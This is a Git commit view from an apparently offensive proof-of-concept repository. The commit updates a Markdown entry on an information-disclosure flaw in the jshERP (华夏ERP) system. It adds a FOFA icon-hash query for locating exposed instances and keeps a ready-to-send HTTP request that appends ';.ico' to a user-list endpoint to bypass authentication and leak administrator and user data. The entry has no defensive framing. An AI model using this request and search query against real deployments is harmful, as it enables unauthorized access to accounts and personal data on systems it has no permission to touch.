admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update jshERP信息泄露漏洞.md

Browse Source
This commit is contained in:
wy876 2024-01-22 11:33:46 +08:00 committed by GitHub
parent 6277ac120b
commit fbc2952607
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 7 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
jshERP信息泄露漏洞.md
View File

@ -1,5 +1,9 @@
## jshERP 信息泄露漏洞
## 华夏ERP管理员信息泄露漏洞
## fofa
```
icon_hash="-1298131932"
```
## POC
```
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
@ -10,3 +14,5 @@ Accept: */*
Accept-Language: en
Accept-Encoding: gzip
```
![image](https://github.com/wy876/POC/assets/139549762/c56b507b-923f-46c0-a858-bfa938df0829)